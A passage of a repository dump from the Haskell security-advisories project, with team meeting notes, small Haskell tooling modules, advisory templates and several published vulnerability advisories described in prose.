8 | , posColumn = 1 9 | } 10 | ) 11 | , matchPath = [] 12 | , matchMessage = "missing key: affected" 13 | } 14 | ] "1:1: missing key: affected in 15 | " 16 | ) 17 | 18 | -------------------------------------------------------------------------------- /meeting-notes/2024-02-21.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-02-21 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-02-07.md 5 | 6 | ## Ongoing security issue (embargoed) 7 | 8 | - Mihai wits for Google approval to share the guidelines (hopefully today or tomorrow) 9 | 10 | ## Small CLI improvements 11 | 12 | - [#148](https://github.com/haskell/security-advisories/pull/148) some progress have been made, but the PR is still in draft 13 | 14 | ## ZuriHac workshop 15 | 16 | - Two days has been nearly filled 17 | - Jose will coordinate HRT and Hackage team 18 | -------------------------------------------------------------------------------- /meeting-notes/2025-02-05.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-02-05 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-01-08.md 5 | 6 | ## 2024 Q4 report (draft) 7 | 8 | - PR: https://github.com/haskell/security-advisories/pull/260 9 | - Please review. FT will publish in ~24h. 10 | 11 | 12 | ## New meeting time: 13 | 14 | - Proposal: **Thursday** UTC 12:00. It works for Lei, Gautier, Fraser. 15 | - Lock it in. Next meeting (2025-02-20) will be at the new time. 16 | - How to change the Google Calendar event? FT will follow up. 17 | - It belongs to Jose, we think. 18 | -------------------------------------------------------------------------------- /meeting-notes/2025-08-07.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-08-07 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-07-23.md 5 | 6 | ## GitHub advisory database registration 7 | 8 | * https://github.com/haskell/security-advisories/issues/11 9 | * Gautier is starting the work. But the relevant maintainer is on 10 | vacation. 11 | 12 | ## Completed tooling work 13 | 14 | * migrate "is version affected" functions to library (#253) 15 | * feat: add links in OSV exports (#165, #252) 16 | * Gautier has published the new packages versions on Hackage 17 | (thanks!) 18 | -------------------------------------------------------------------------------- /meeting-notes/2023-11-01.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-11-01 2 | 3 | Previous notes: https://edit.smart-cactus.org/cpEZf5ykQZGowfAzI3OPcA?both# 4 | 5 | ## Present 6 | 7 | - Tristan, Gautier and Fraser 8 | 9 | 10 | ## CVSS 11 | 12 | - Tristan is working through the TODOs. 13 | 14 | ## GitHub automation 15 | 16 | - Fraser is hoping to start work during the next 2 weeks. 17 | 18 | 19 | ## Outstanding embargoed issue 20 | 21 | - Follow up with Mihai if he knows the status. We might 22 | set a date for disclosure and advise downstream and upstream 23 | 24 | ## Quarterly report 25 | 26 | - We are overdue for the Q3 report. Fraser will draft 27 | a report in the next period. -------------------------------------------------------------------------------- /meeting-notes/2025-04-02.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-04-02 2 | 3 | Present: Gautier, Montez, Mihai, JOse 4 | 5 | Previously: 6 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-03-20.md 7 | 8 | ## ZuriHac + Ecosystem Workshop 9 | 10 | - Gautier confirmed his attendance for the full event. 11 | - Mihai still a maybe. 12 | 13 | ## HSEC-2025-0002: Double Public Key Signing Function Oracle Attack on Ed25519 14 | 15 | - Gautier created the PR For cryptonite [#268](https://github.com/haskell/security-advisories/pull/268) 16 | - Tristan noticed crypton was also vulnerable 17 | - Fraser submitted a patch 18 | - The maintainer published a new version on Hackage 19 | -------------------------------------------------------------------------------- /code/hsec-sync/src/Security/Advisories/Sync/Url.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE LambdaCase #-} 2 | module Security.Advisories.Sync.Url 3 | ( mkUrl 4 | , ensureFile 5 | ) 6 | where 7 | 8 | mkUrl :: [String] -> String 9 | mkUrl = foldl1 () 10 | 11 | infixr 5 12 | 13 | () :: String -> String -> String 14 | "/" ('/' : ys) = '/' : ys 15 | "/" ys = '/' : ys 16 | "" ('/' : ys) = '/' : ys 17 | "" ys = '/' : ys 18 | [x] ('/' : ys) = x : '/' : ys 19 | [x] ys = x : '/' : ys 20 | (x0 : x1 : xs) ys = x0 : ((x1 : xs) ys) 21 | 22 | ensureFile :: String -> String 23 | ensureFile = 24 | \case 25 | "" -> "" 26 | "/" -> "" 27 | (x:xs) -> x : ensureFile xs 28 | -------------------------------------------------------------------------------- /meeting-notes/2023-12-13.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-12-13 2 | 3 | Previous meeting notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-11-29.md 4 | 5 | ## Previous AIs 6 | 7 | - Website publication (from https://github.com/haskell/security-advisories/tree/generated/gh-pages ) 8 | - "Quarterly" report still TODO 9 | 10 | ## OSV output fixed 11 | 12 | - Reported by a community member: https://github.com/haskell/security-advisories/issues/135 13 | 14 | ## Website 15 | 16 | - Need to request the creation of this repository: https://github.com/haskell/haskell.github.io 17 | 18 | ## CWE data type 19 | 20 | - TC: to add osv export golden test and rebase the PR 21 | -------------------------------------------------------------------------------- /meeting-notes/2024-01-24.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-01-24 2 | 3 | Previous meeting notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-01-10.md 4 | 5 | ## Undisclosed security issue 6 | 7 | - Received via the mailing-list 8 | - the reporter was unable to send the full report (the PDF is too big) 9 | - Gautier has contacted the maintainers. 10 | 11 | ## WebSite got published 12 | 13 | Initial version is now available at: https://haskell.github.io/security-advisories/ 14 | 15 | ## Report got published 16 | 17 | The H2 report has been published on discourse: 18 | https://discourse.haskell.org/t/haskell-security-response-team-2023-july-december-report/8531 19 | -------------------------------------------------------------------------------- /meeting-notes/2025-11-27.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-11-27 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-10-30.md 4 | 5 | ## Status on embargoed advisory 6 | (redacted) 7 | 8 | ## Repo re-org 9 | 10 | - It was merged, some stuff broke (including cabal-audit) 11 | 12 | - Fraser fixed OSV publishing. 13 | 14 | Downstream breakage: 15 | 16 | - Report: 17 | https://github.com/haskell/security-advisories/issues/304 18 | (Gautier will brain-dump into that discussion) 19 | - cabal-audit report: 20 | https://github.com/MangoIV/cabal-audit/issues/64 21 | 22 | - Lesson: we need integration tests 23 | - **Idea: should we write an integration guide?** 24 | -------------------------------------------------------------------------------- /meeting-notes/2024-12-11.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-12-11 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-11-27.md 5 | 6 | ## GitHub OSSF 7 | 8 | - Gautier published a draft on the SRT mailing list 9 | - Let's review it on the ML and publish it on Discourse 10 | 11 | ## json-schema validation in CI 12 | 13 | - The task is proposed in 14 | [#254](https://github.com/haskell/security-advisories/pull/254). 15 | - Tested and validated, ready for merge. 16 | 17 | ## Advisories index hosting 18 | 19 | - Gautier improved advisory's page layout 20 | - Start to discuss haskell.org with Jose, he'll talk about it in the 21 | next *haskell.org*/*infrastructure* meeting 22 | -------------------------------------------------------------------------------- /meeting-notes/2025-08-20.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-08-20 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-08-07.md 5 | 6 | Attended: 7 | 8 | - Fraser 9 | - Gautier 10 | - Montez 11 | 12 | 13 | ## Database structure re-org 14 | 15 | - FT proposed reorg of database 16 | - Gautier made a PR: 17 | https://github.com/haskell/security-advisories/pull/293 18 | - Mihai reviewed. FT will also review it. 19 | 20 | ## HSEC Top Ten? 21 | 22 | - About time we did this blog post / guide :) FT will draft it. 23 | 24 | ## Security prospectus 25 | 26 | - Montez will start pulling ideas together 27 | - FT will mail the list to define objectives and audience of the 28 | prospectus 29 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/EXAMPLE_ADVISORY_GHC.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-0000-0000" 5 | cwe = [] 6 | keywords = ["example", "freeform", "keywords"] 7 | aliases = ["CVE-2022-XXXX"] 8 | related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"] 9 | 10 | [[affected]] 11 | ghc-component = "ghci" 12 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 13 | 14 | [[affected.versions]] 15 | introduced = "1.0.8" 16 | fixed = "1.1" 17 | [[affected.versions]] 18 | introduced = "1.1.2" 19 | 20 | [[references]] 21 | type = "ARTICLE" 22 | url = "https://example.com" 23 | ``` 24 | 25 | # Advisory Template - Title Goes Here 26 | 27 | This is an example template. 28 | 29 | * Markdown 30 | * TOML "front matter". 31 | 32 | > Acme Broken. 33 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/EXAMPLE_ADVISORY_HACKAGE.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-0000-0000" 5 | cwe = [] 6 | keywords = ["example", "freeform", "keywords"] 7 | aliases = ["CVE-2022-XXXX"] 8 | related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"] 9 | 10 | [[affected]] 11 | package = "package-name" 12 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 13 | 14 | [[affected.versions]] 15 | introduced = "1.0.8" 16 | fixed = "1.1" 17 | [[affected.versions]] 18 | introduced = "1.1.2" 19 | 20 | [[references]] 21 | type = "ARTICLE" 22 | url = "https://example.com" 23 | ``` 24 | 25 | # Advisory Template - Title Goes Here 26 | 27 | This is an example template. 28 | 29 | * Markdown 30 | * TOML "front matter". 31 | 32 | > Acme Broken. 33 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | All advisories in the HSec advisory database repository is dedicated to 2 | the public domain: 3 | 4 | https://creativecommons.org/publicdomain/zero/1.0/ 5 | 6 | By committing an advisory to this repository, you hereby waive all 7 | rights to the work worldwide under copyright law, including all 8 | related and neighboring rights, to the extent allowed by law. 9 | 10 | You can copy, modify, distribute, and retransmit any security advisory 11 | information in this repository, even for commercial purposes, without 12 | asking permission. 13 | 14 | ------------------------------------------------------- 15 | 16 | The code for processing advisories (in the "code" directory) is 17 | licensed separately, under the 3-clause BSD license. See 18 | code/LICENSE.txt for details. 19 | -------------------------------------------------------------------------------- /code/hsec-tools/app/Util.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE LambdaCase #-} 2 | 3 | module Util where 4 | 5 | import Data.Maybe (fromMaybe) 6 | import System.Exit (die) 7 | 8 | import Security.Advisories.Filesystem (isSecurityAdvisoriesRepo) 9 | import Security.Advisories.Git (getRepoRoot) 10 | 11 | -- | Ensure the given path (or current directory "." if @Nothing@) 12 | -- is an advisory Git repo. Return the (valid) repo root, or die 13 | -- with an error message. 14 | -- 15 | ensureRepo :: Maybe FilePath -> IO FilePath 16 | ensureRepo mPath = 17 | getRepoRoot (fromMaybe "." mPath) >>= \case 18 | Left _ -> die "Not a git repo" 19 | Right repoPath -> isSecurityAdvisoriesRepo repoPath >>= \case 20 | False -> die "Not a security-advisories repo" 21 | True -> pure repoPath 22 | -------------------------------------------------------------------------------- /meeting-notes/2024-02-07.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-02-07 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-01-24.md 5 | 6 | ## Ongoing security issue (embargoed) 7 | 8 | - SRT agrees it matters, but it is out of our hands. 9 | - All we can do is make recommendations. 10 | - Mihai will lead response. 11 | 12 | ## hackage-server 13 | 14 | - Gautier filed a PR adding link to security-advisories repo: 15 | https://github.com/haskell/hackage-server/pull/1292 16 | 17 | ## Small CLI improvements 18 | 19 | - A community member worked on small fix in 20 | [#147](https://github.com/haskell/security-advisories/pull/147) and 21 | bootstrapped the cabal audit command in 22 | [#148](https://github.com/haskell/security-advisories/pull/148). 23 | -------------------------------------------------------------------------------- /meeting-notes/2024-07-10.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-07-10 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-06-26.md 5 | 6 | ## Advisories ecosystem ([#213](https://github.com/haskell/security-advisories/pull/213)) 7 | 8 | - Schema update proposed. 9 | - Example advisories for GHC proposed in [#214](https://github.com/haskell/security-advisories/pull/214). 10 | 11 | ## Snapshots 12 | 13 | - FT still needs to (re)review Gautier's PR. 14 | 15 | ## Growing SRT / call for volunteers 16 | 17 | - Time to draft a call for volunteers ([previous one](https://discourse.haskell.org/t/call-for-volunteers-haskell-security-response-team/5770)) 18 | - How many people? 19 | 20 | ## Dependabot 21 | 22 | - Gautier will ping people who had previously attempted GitHub integration 23 | -------------------------------------------------------------------------------- /meeting-notes/2023-11-29.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-11-29 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-11-15.md 5 | 6 | ## Previous AIs 7 | 8 | - Website - generation and pushing to `generated/gh-pages` is done. 9 | But it is not being published as expected. Investigation ongoing. 10 | - FT synced with Jose. 11 | - "Quarterly" report still TODO 12 | 13 | ## Purl-spec refinements 14 | 15 | - https://github.com/haskell/security-advisories/issues/102 16 | - Casey: should be happening soon 17 | 18 | ## GitHub tooling 19 | 20 | - FT hoping to start over Christmas break 21 | 22 | ## Libraries 23 | 24 | - Still plan to do OSV extration. 25 | - Still plan to extract our core Advisory types and parsing/printing. 26 | - Publishing our libs on Hackage. 27 | -------------------------------------------------------------------------------- /meeting-notes/2025-06-12.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-06-12 2 | 3 | Attended: Gautier, Fraser 4 | 5 | Previously: 6 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-05-28.md 7 | 8 | ## ZuriHac recap 9 | 10 | - Gautier and Tristan (and Jose) attended. 11 | - purl support PR: 12 | https://github.com/haskell/security-advisories/pull/282 13 | - Flora overall happy with our library support. 14 | - We need to implement support for more repos e.g. MLabs. 15 | - design sketch: 16 | https://github.com/haskell/security-advisories/issues/240 17 | 18 | ## cabal depedendency confusion advisory 19 | 20 | - https://github.com/haskell/security-advisories/pull/281 21 | - There are mitigations since v3.4.0.0, propose to set that as 22 | `fixed` version. 23 | - Not everyone agrees; discussion continues. 24 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/EXAMPLE_ADVISORY_REPO.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-0000-0000" 5 | cwe = [] 6 | keywords = ["example", "freeform", "keywords"] 7 | aliases = ["CVE-2022-XXXX"] 8 | related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"] 9 | 10 | [[affected]] 11 | repository-url = "https://hackage.example.org/" 12 | repository-name = "example" 13 | package = "package-name" 14 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 15 | 16 | [[affected.versions]] 17 | introduced = "1.0.8" 18 | fixed = "1.1" 19 | [[affected.versions]] 20 | introduced = "1.1.2" 21 | 22 | [[references]] 23 | type = "ARTICLE" 24 | url = "https://example.com" 25 | ``` 26 | 27 | # Advisory Template - Title Goes Here 28 | 29 | This is an example template. 30 | 31 | * Markdown 32 | * TOML "front matter". 33 | 34 | > Acme Broken. 35 | -------------------------------------------------------------------------------- /meeting-notes/2024-08-21.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-08-21 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-08-07 5 | 6 | ## Embargoed vulnerability work 7 | 8 | We provided a fix and we are coordinating the disclosure. 9 | 10 | ## Call for Volunteers 11 | 12 | Jose wrote a draft to be communicated soon. 13 | 14 | ## GitHub Action cabal-audit scan 15 | 16 | * Gautier has a minimal working version [GitHub Action](https://github.com/blackheaven/haskell-security-action) 17 | * Some example: [here](https://github.com/blackheaven/vulnerable-sandbox/security/code-scanning/1) 18 | * He made a [RFC](https://discourse.haskell.org/t/request-for-comments-github-haskell-security-action/10191) 19 | * After discussing with MangoIV, Gautier will upstream the sarif file generation in `cabal-audit` 20 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0006.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0006" 4 | cwe = [295] 5 | keywords = ["x509", "pki", "historical"] 6 | 7 | [[affected]] 8 | package = "x509-validation" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" 10 | 11 | [[affected.versions]] 12 | introduced = "1.4.0" 13 | fixed = "1.4.8" 14 | 15 | [[references]] 16 | type = "FIX" 17 | url = "https://github.com/haskell-tls/hs-certificate/commit/06d15dbbc53739314760d8504ca764000770e46e" 18 | ``` 19 | 20 | # x509-validation does not enforce pathLenConstraint 21 | 22 | *x509-validation* prior to version 1.4.8 did not enforce the 23 | pathLenConstraint value. Constrained CAs could accidentally (or 24 | deliberately) issue CAs below the maximum depth and 25 | *x509-validation* would accept certificates issued by the 26 | unauthorised intermediate CAs. 27 | -------------------------------------------------------------------------------- /docs/packages.md: -------------------------------------------------------------------------------- 1 | ## Packages owned by the Haskell SRT 2 | 3 | - [cvss](https://hackage.haskell.org/package/cvss) 4 | - [hsec-core](https://hackage.haskell.org/package/hsec-core) 5 | - [hsec-sync](https://hackage.haskell.org/package/hsec-sync) 6 | - [hsec-tools](https://hackage.haskell.org/package/hsec-tools) 7 | - [osv](https://hackage.haskell.org/package/osv) 8 | - [purl](https://hackage.haskell.org/package/purl) 9 | 10 | ## Maintainership policies 11 | 12 | At all times, at least 2 SRT members should be in the maintainer 13 | group for every SRT-owned package. 14 | 15 | Trusted collaborators can be added as maintainers at the discretion 16 | of the SRT. 17 | 18 | Non-SRT maintainers (including former SRT members) must be regularly 19 | reviewed. We will revoke the maintainership of inactive or 20 | unresponsive non-SRT maintainers, for safekeeping. 21 | -------------------------------------------------------------------------------- /meeting-notes/2024-04-17.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-04-17 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-04-03.md 5 | 6 | ## YAML vulnerability 7 | 8 | * Assessment in progress for CVE-2024-3205 ([#181](https://github.com/haskell/security-advisories/issues/181)) 9 | 10 | ## Revised HSEC-2024-0003 11 | 12 | * Updated advisory to include released fixes ([#191](https://github.com/haskell/security-advisories/pull/191)) 13 | 14 | ## Initial Hackage password storage migration plan 15 | 16 | * Fraser came up with a draft 17 | * Some comments have been made but everyone agree it is the right direction 18 | 19 | ## SRT meeting rescheduling 20 | 21 | * Over time the chosen time-slot seems to conflict with team members' schedules 22 | * Gautier will create and send a new poll to pick a more suitable one 23 | -------------------------------------------------------------------------------- /meeting-notes/2024-05-15.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-05-15 2 | 3 | Previous notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-05-01.md 5 | 6 | ## Cabal plan integration 7 | 8 | - A new cabal-audit project consuming the security-avisories is now being worked on https://github.com/mangoiv/cabal-audit 9 | 10 | ## CI Security Advice Update 11 | 12 | - Shared on [discourse]( https://discourse.haskell.org/t/how-to-secure-github-repositories/9478) 13 | - Updated the guide based on feedback [PR#193](https://github.com/haskell/security-advisories/pull/193) 14 | 15 | ## Hackage Auth 16 | 17 | - Discussed with hackage team to improve the authentication scheme. 18 | 19 | ## Dependencies analysis 20 | 21 | - Investigated getting in touch with deps.dev to increase audit coverage. 22 | - Also considering dependabot support for cabal dependencies. 23 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Generate/TH.hs: -------------------------------------------------------------------------------- 1 | module Security.Advisories.Generate.TH ( 2 | readFileTH, 3 | readDirFilesTH, 4 | fileLocation, 5 | ) where 6 | 7 | import Control.Monad.IO.Class (liftIO) 8 | import Data.ByteString.Char8 as BS8 9 | import Data.FileEmbed (embedDir, makeRelativeToLocationPredicate) 10 | import Language.Haskell.TH (Exp (LitE), Lit (StringL), Q) 11 | 12 | -- | Read file at compile-time. 13 | readFileTH :: FilePath -> Q Exp 14 | readFileTH p = fileLocation p $ \p' -> LitE . StringL . BS8.unpack <$> liftIO (BS8.readFile p') 15 | 16 | -- | Read files in (sub-)directory at compile-time. 17 | -- Gives a [(FilePath, ByteString)] 18 | readDirFilesTH :: FilePath -> Q Exp 19 | readDirFilesTH p = fileLocation p embedDir 20 | 21 | fileLocation :: FilePath -> (FilePath -> Q Exp) -> Q Exp 22 | fileLocation fp act = makeRelativeToLocationPredicate (== "hsec-tools.cabal") fp >>= act 23 | -------------------------------------------------------------------------------- /meeting-notes/2023-11-15.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-11-15 2 | 3 | Previous notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-11-01.md 4 | 5 | ## Previous AIs 6 | 7 | - FT still need to write up (overdue) quarterly report 8 | 9 | ## cabal-install issue 10 | 11 | - It is now public and the HSEC advisory created. 12 | - https://osv.dev/vulnerability/HSEC-2023-0015 13 | 14 | ## Purl-spec refinements 15 | 16 | - https://github.com/haskell/security-advisories/issues/102 17 | - This work should resume soon 18 | 19 | ## Website 20 | 21 | - https://github.com/haskell/security-advisories/issues/31 22 | - Where to publish 23 | - GitHub pages, and ask haskell.org for a subdomain? 24 | - Gautier will handle GitHub pages publication 25 | - **AI**: Mihai will ask. 26 | 27 | ## VEX 28 | 29 | ## New HF ED 30 | 31 | - FT will sync with Jose and let him know what we're up to. 32 | -------------------------------------------------------------------------------- /code/hsec-tools/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## 0.3.0.1 2 | 3 | * Bump `hsec-core` `0.3.0.0` 4 | 5 | ## 0.3.0.0 6 | 7 | * Move `isVersionAffectedBy` and `isVersionRangeAffectedBy` to `Security.Advisories.Core` (`hsec-core`) 8 | * Add support for GHC component in `query is-affected` 9 | * Add `model.database_specific.{repository,osvs,home}` and `model.affected.database_specific.{osv,human_link}` in OSV exports 10 | * Adapt to new security-advisories layout 11 | * Drop `Security.Advisories.Filesystem.parseComponentIdentifier` 12 | * Drop `Security.Advisories.Parse.OutOfBandAttributes.oobComponentIdentifier` 13 | * Drop `Security.Advisories.Parse.OOBError.PathHasNoComponentIdentifier` 14 | 15 | ## 0.2.0.2 16 | 17 | * Update `tasty` dependency bounds 18 | * Update `osv` dependency bounds 19 | 20 | ## 0.2.0.1 21 | 22 | - Rework HTML/Atom generation, use `atom-conduit` instead of `feed` 23 | 24 | ## 0.1.1.0 25 | 26 | - Redesign index 27 | -------------------------------------------------------------------------------- /meeting-notes/2024-03-20.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-03-20 2 | 3 | - Previous meeting: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-03-20.md 5 | 6 | ## Code update 7 | 8 | - We implemented an atom feed in [#160](https://github.com/haskell/security-advisories/pull/157): https://haskell.github.io/security-advisories/atom.xml 9 | - We added a CAPEC field in [#164](https://github.com/haskell/security-advisories/pull/164). 10 | - The command line to check a given project is taking shape in [#148](https://github.com/haskell/security-advisories/pull/148). 11 | - The CWE module is still up for review ([#116](https://github.com/haskell/security-advisories/pull/116)). 12 | 13 | ## Advisory update 14 | 15 | - We published HSEC-2024-0002 quickly after the initial report ([#157](https://github.com/haskell/security-advisories/pull/157)). 16 | - We are coordinating a new issue reported via the mailing-list. 17 | -------------------------------------------------------------------------------- /meeting-notes/2025-05-15.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-05-15 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-04-30.md 5 | 6 | ## proposal: c-lib best practices guide 7 | 8 | - Two recommended approaches: 9 | - Use system clibs 10 | - Bundle the clib in a standalone cabal package, then depend on 11 | that. e.g.: 12 | - https://hackage.haskell.org/package/lzma-clib 13 | - https://hackage.haskell.org/package/libyaml-clib 14 | - Write up the recommended approaches and discourage other kinds of 15 | vendoring. 16 | - FT will propose to mailing list and see if someone will take it 17 | on. 18 | 19 | 20 | ## ZuriHac ideas 21 | 22 | - Gautier and Fraser populated the idea list: 23 | https://github.com/haskell/security-advisories/issues/272 24 | - Ecosystem library review, i.e. for security-related use cases, 25 | what libs are there. Can we do a list with commentary? 26 | -------------------------------------------------------------------------------- /.github/haskell-ci.patch: -------------------------------------------------------------------------------- 1 | diff --git a/.github/workflows/haskell-ci.yml b/.github/workflows/haskell-ci.yml 2 | index 96282c2..e40c573 100644 3 | --- a/.github/workflows/haskell-ci.yml 4 | +++ b/.github/workflows/haskell-ci.yml 5 | @@ -19,6 +19,21 @@ 6 | jobs: 7 | + tools_changed: 8 | + continue-on-error: true 9 | + runs-on: ubuntu-24.04 10 | + outputs: 11 | + should_skip: ${{ steps.skip_check.outputs.should_skip }} 12 | + steps: 13 | + - id: skip_check 14 | + uses: fkirc/skip-duplicate-actions@v5.3.1 15 | + with: 16 | + concurrent_skipping: "never" 17 | + skip_after_successful_duplicate: "true" 18 | + paths: '["code/**"]' 19 | + do_not_skip: '["push", "workflow_dispatch", "schedule"]' 20 | linux: 21 | name: Haskell-CI - Linux - ${{ matrix.compiler }} 22 | + needs: tools_changed 23 | + if: ${{ needs.tools_changed.outputs.should_skip != 'true' }} 24 | runs-on: ubuntu-24.04 25 | timeout-minutes: 26 | 60 27 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0003.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0003" 4 | cwe = [94] 5 | keywords = ["code", "injection", "historical"] 6 | aliases = ["CVE-2013-1436"] 7 | 8 | [[affected]] 9 | package = "xmonad-contrib" 10 | cvss = "AV:N/AC:L/Au:N/C:P/I:P/A:P" 11 | [[affected.versions]] 12 | introduced = "0.5" 13 | fixed = "0.11.2" 14 | 15 | [[references]] 16 | type = "ADVISORY" 17 | url = "https://security.gentoo.org/glsa/201405-28" 18 | [[references]] 19 | type = "DISCUSSION" 20 | url = "http://www.openwall.com/lists/oss-security/2013/07/26/5" 21 | [[references]] 22 | type = "FIX" 23 | url = "https://github.com/xmonad/xmonad-contrib/commit/d3b2a01e3d01ac628e7a3139dd55becbfa37cf51" 24 | ``` 25 | 26 | # code injection in *xmonad-contrib* 27 | 28 | The `XMonad.Hooks.DynamicLog` module in _xmonad-contrib_ before 29 | **0.11.2** allows remote attackers to execute arbitrary commands via a 30 | web page title, which activates the commands when the user clicks on 31 | the xmobar window title, as demonstrated using an action tag. 32 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0008.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0008" 4 | cwe = [194] 5 | keywords = ["integrity", "dos"] 6 | 7 | [[affected]] 8 | ghc-component = "ghc" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" 10 | 11 | [[affected.versions]] 12 | introduced = "9.2.1" 13 | fixed = "9.6.6" 14 | 15 | [[affected.versions]] 16 | introduced = "9.8.1" 17 | fixed = "9.8.3" 18 | 19 | [[affected.versions]] 20 | introduced = "9.10.1" 21 | 22 | [[references]] 23 | type = "REPORT" 24 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/23034" 25 | 26 | [[references]] 27 | type = "FIX" 28 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/12885" 29 | ``` 30 | 31 | # Sign extension error in the PPC64le FFI 32 | 33 | Numeric arguments of FFI call on the PPC64le backend may result in incorrect runtime values. 34 | For the most part, this bug only causes availability and data integrity issues. 35 | However, in some circumstances, it may result in other, more complicated security related flaws, such as buffer overflow conditions. 36 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0001.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0001" 4 | cwe = [682] 5 | keywords = ["integrity", "dos"] 6 | 7 | [[affected]] 8 | ghc-component = "ghc" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" 10 | 11 | [[affected.versions]] 12 | introduced = "9.12.1" 13 | fixed = "9.12.2" 14 | 15 | [[references]] 16 | type = "REPORT" 17 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/25653" 18 | 19 | [[references]] 20 | type = "REPORT" 21 | url = "https://discourse.haskell.org/t/psa-correctness-issue-in-ghc-9-12/11204" 22 | 23 | [[references]] 24 | type = "FIX" 25 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/13820" 26 | ``` 27 | 28 | # Subword division operations may produce incorrect results 29 | 30 | Arithmetic operations may produce incorrect results when compiled with optimizations. 31 | For the most part, this bug only causes availability and data integrity issues. 32 | However, in some circumstances, it may result in other, more complicated security related flaws, such as buffer overflow conditions. 33 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0002.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0002" 4 | cwe = [347] 5 | keywords = ["crypto", "historical"] 6 | aliases = ["CVE-2022-31053"] 7 | related = ["GHSA-75rw-34q6-72cr"] 8 | 9 | [[affected]] 10 | package = "biscuit-haskell" 11 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 12 | [[affected.versions]] 13 | introduced = "0.1.0.0" 14 | fixed = "0.2.0.0" 15 | 16 | 